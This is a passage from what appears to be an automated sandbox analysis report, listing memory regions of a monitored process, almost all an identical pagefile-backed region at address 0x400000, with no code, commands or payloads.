1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8336 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8337 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8338 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8339 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8340 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8341 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8342 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8343 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8344 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8345 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8346 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8347 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8348 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8349 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8350 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8351 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8352 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8353 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8354 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8355 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8356 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8357 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8358 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8359 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8360 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8361 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8362 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8363 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8364 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8365 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8366 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8367 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8368 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8369 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8370 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8371 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8372 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8373 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8374 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8375 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8376 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8377 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8378 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8379 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8380 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8382 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8383 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8384 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8386 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8387 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8388 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8389 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8390 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8391 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8392 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8393 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8394 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8395 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8396 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8397 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8398 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8399 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8400 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8401 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8402 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8403 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8404 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8405 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8406 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8407 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8408 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8409 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8410 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8411 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8412 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8413 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8414 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8415 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8416 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8417 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8418 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8419 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8420 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8421 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8422 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8423 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8424 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8425 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8426 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8427 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8428 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8429 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8430 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8431 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8432 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8433 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8434 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8435 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8436 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8437 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8438 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8439 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8440 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8441 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8442 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8443 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8444 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8445 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8446 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8447 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8448 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8449 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8450 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8451 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8452 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8453 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8454 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8455 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8456 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8457 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8458 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8459 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8460 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8461 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8462 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8463 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8464 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8465 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8466 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8467 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8468 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8469 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8470 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8471 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8472 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8473 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8474 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8475 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8476 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8477 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8478 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8479 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8480 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8481 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8482 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8483 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8484 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8485 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8486 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8487 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8488 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8489 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8490 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8491 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8492 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8493 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8494 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8495 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8496 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8497 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8498 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8499 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8500 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8501 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8502 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8503 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8504 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8505 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8506 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8507 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8508 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8509 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8510 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8511 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8512 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8513 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8514 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8515 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8516 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8517 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8518 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8519 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8520 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8521 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8522 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8523 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8524 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8525 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = 